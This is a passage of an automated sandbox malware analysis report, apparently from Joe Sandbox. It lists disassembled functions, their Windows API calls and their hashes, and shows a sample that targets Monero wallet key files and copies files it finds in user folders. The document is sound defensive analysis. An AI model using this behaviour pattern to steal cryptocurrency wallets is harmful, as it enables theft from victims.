API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 5e0e1ecd0ef7c29dc540efbd3b4c4a3db886dce3475f60f43e2367198fcbc71e
Instruction ID: 8d1db8cbb60e8caa67920f11d8b207afca8b3ae8f83c5f708d8c40870f81fb0c
Opcode Fuzzy Hash: 5e0e1ecd0ef7c29dc540efbd3b4c4a3db886dce3475f60f43e2367198fcbc71e
Instruction Fuzzy Hash: DBE11972910918ABDB16FBA0CC92DEE7738BF54304F404159F607BA891EF346E49DB62

Function 003AAEF0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

Part of subcall function 003BA9B0: lstrlen.KERNEL32(?,00F38938,?,\Monero\wallet.keys,003C0E17), ref: 003BA9C5
Part of subcall function 003BA9B0: lstrcpy.KERNEL32(00000000), ref: 003BAA04
Part of subcall function 003BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003BAA12

Part of subcall function 003BA920: lstrcpy.KERNEL32(00000000,?), ref: 003BA972
Part of subcall function 003BA920: lstrcat.KERNEL32(00000000), ref: 003BA982

Part of subcall function 003BA8A0: lstrcpy.KERNEL32(?,003C0E17), ref: 003BA905

lstrlen.KERNEL32(00000000), ref: 003AB16A
lstrlen.KERNEL32(00000000), ref: 003AB17E

Part of subcall function 003BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003BA7E6

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 96e7da4b65ffffeacfb20e7f55c6a432ea3e2d9f4d1b967548d890e6917cff8b
Instruction ID: 571138501037859a8286d0bc06f06fc2fa0edbfcdbd2bb811d0862d1c77b3abe
Opcode Fuzzy Hash: 96e7da4b65ffffeacfb20e7f55c6a432ea3e2d9f4d1b967548d890e6917cff8b
Instruction Fuzzy Hash: 72915A71910908ABDF1AFBA0DCA1DEE7738AF54304F404159F607FA851EF346A09DB62

Function 003AB230 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

Part of subcall function 003BA9B0: lstrlen.KERNEL32(?,00F38938,?,\Monero\wallet.keys,003C0E17), ref: 003BA9C5
Part of subcall function 003BA9B0: lstrcpy.KERNEL32(00000000), ref: 003BAA04
Part of subcall function 003BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003BAA12

Part of subcall function 003BA920: lstrcpy.KERNEL32(00000000,?), ref: 003BA972
Part of subcall function 003BA920: lstrcat.KERNEL32(00000000), ref: 003BA982

Part of subcall function 003BA8A0: lstrcpy.KERNEL32(?,003C0E17), ref: 003BA905

lstrlen.KERNEL32(00000000), ref: 003AB42E
lstrlen.KERNEL32(00000000), ref: 003AB442

Part of subcall function 003BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003BA7E6

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 1d8ac4903e488b12e0156ff2f3300bb03691984a2d0ab3b9006a49554f257689
Instruction ID: 201b674acede00390fc2e8033952ed8feb8a12ec0e49a4f769706c1f1cb451ed
Opcode Fuzzy Hash: 1d8ac4903e488b12e0156ff2f3300bb03691984a2d0ab3b9006a49554f257689
Instruction Fuzzy Hash: C7713871910908A7DF16FBA0DCA6DEE7778BF54304F404518F642EA891EF346A09DB62

Function 003B4BB0 Relevance: 2.6, APIs: 2, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003B8E0B

lstrcat.KERNEL32(?,00000000), ref: 003B4BEA
lstrcat.KERNEL32(?,00F3D390), ref: 003B4C08

Part of subcall function 003B4910: wsprintfA.USER32 ref: 003B492C
Part of subcall function 003B4910: FindFirstFileA.KERNEL32(?,?), ref: 003B4943

Part of subcall function 003B4910: StrCmpCA.SHLWAPI(?,003C0FDC), ref: 003B4971
Part of subcall function 003B4910: StrCmpCA.SHLWAPI(?,003C0FE0), ref: 003B4987
Part of subcall function 003B4910: FindNextFileA.KERNEL32(000000FF,?), ref: 003B4B7D
Part of subcall function 003B4910: FindClose.KERNEL32(000000FF), ref: 003B4B92

Part of subcall function 003B4910: wsprintfA.USER32 ref: 003B49B0
Part of subcall function 003B4910: StrCmpCA.SHLWAPI(?,003C08D2), ref: 003B49C5
Part of subcall function 003B4910: wsprintfA.USER32 ref: 003B49E2
Part of subcall function 003B4910: PathMatchSpecA.SHLWAPI(?,?), ref: 003B4A1E
Part of subcall function 003B4910: lstrcat.KERNEL32(?,00F3F118), ref: 003B4A4A
Part of subcall function 003B4910: lstrcat.KERNEL32(?,003C0FF8), ref: 003B4A5C
Part of subcall function 003B4910: lstrcat.KERNEL32(?,?), ref: 003B4A70
Part of subcall function 003B4910: lstrcat.KERNEL32(?,003C0FFC), ref: 003B4A82
Part of subcall function 003B4910: lstrcat.KERNEL32(?,?), ref: 003B4A96
Part of subcall function 003B4910: CopyFileA.KERNEL32(?,?,00000001), ref: 003B4AAC
Part of subcall function 003B4910: DeleteFileA.KERNEL32(?), ref: 003B4B31

Part of subcall function 003B4910: wsprintfA.USER32 ref: 003B4A07

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: 646544cffa2f6484b25056e9c840699c9fe099c112e0ee8c89d9d21ff2eb32ac
Instruction ID: d6d56c31d2a698a151083bb0eb7d9073744099ddba7fb85a524dc616e653ca6a
Opcode Fuzzy Hash: 646544cffa2f6484b25056e9c840699c9fe099c112e0ee8c89d9d21ff2eb32ac
Instruction Fuzzy Hash: 68418D7B90020467D759F7B0EC82EEE337DA799700F00854CB6859E586EE756B8C8B92

Function 003A6660 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 003A6706
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 003A6753

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 875895dc976369ab1cb73772719550102161a6c4ef1f16383d70300bec82f25f
Instruction ID: 4df8f8431084c8263ca47fa4be9f656252cb06a144dfef40f041138c2c863647
Opcode Fuzzy Hash: 875895dc976369ab1cb73772719550102161a6c4ef1f16383d70300bec82f25f
Instruction Fuzzy Hash: 4A41DB74A00209EFCB45CF98C495BADBBB1FF48314F2482A9E9599B355D731EA81CF84

Function 003B5050 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003B8E0B

lstrcat.KERNEL32(?,00000000), ref: 003B508A
lstrcat.KERNEL32(?,00F3EC30), ref: 003B50A8

Part of subcall function 003B4910: wsprintfA.USER32 ref: 003B492C
Part of subcall function 003B4910: FindFirstFileA.KERNEL32(?,?), ref: 003B4943

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID:
API String ID: 2699682494-0
Opcode ID: e0c0050802c6ef030920b26424298e6ed4f2907b61764cbe39d4bc96da6fdcbc
Instruction ID: 2b0d2a66d866e33c0a12f70564d2d254c17b453397c831f8aabeeeb68aec54c7
Opcode Fuzzy Hash: e0c0050802c6ef030920b26424298e6ed4f2907b61764cbe39d4bc96da6fdcbc
Instruction Fuzzy Hash: 33019F7690020867CB59FB70DC83DDD737C9B64300F004548B7859A591EF70AA8DDB92

Function 003A10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 003A10B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 003A10F7

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 7bb94e5c3b1c9459db49d173ac006e2f7004d28c5b8a5b0f72cc2246a4a0760e
Instruction ID: fc56a9d39c2ea589ab69aa5be544eb8c2144064b86b9e2d91844bf6bf4352b32
Opcode Fuzzy Hash: 7bb94e5c3b1c9459db49d173ac006e2f7004d28c5b8a5b0f72cc2246a4a0760e
Instruction Fuzzy Hash: 96F0E271641208BBEB14DBB4AC89FAAB7ECE705B15F301448F644E7280D571AE04DAA0

Function 003B8D90 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,003A1B54,?,?,003C564C,?,?,003C0E1F), ref: 003B8D9F

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 07fe97392ddefbaaa387e54392f76369babe1f8c899ce3168e8041ef15712ad2
Instruction ID: 3c9a6ad5cb5a15c491afae74015404d390f32377bc436f9ff6bddeb830060e5e
Opcode Fuzzy Hash: 07fe97392ddefbaaa387e54392f76369babe1f8c899ce3168e8041ef15712ad2
Instruction Fuzzy Hash: 8CF01C70C0060CEBCB05EFA4D5456DCBB78EB10314F10819AD9556BAC0DB345A45DF81

Function 003B8DE0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003B8E0B

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

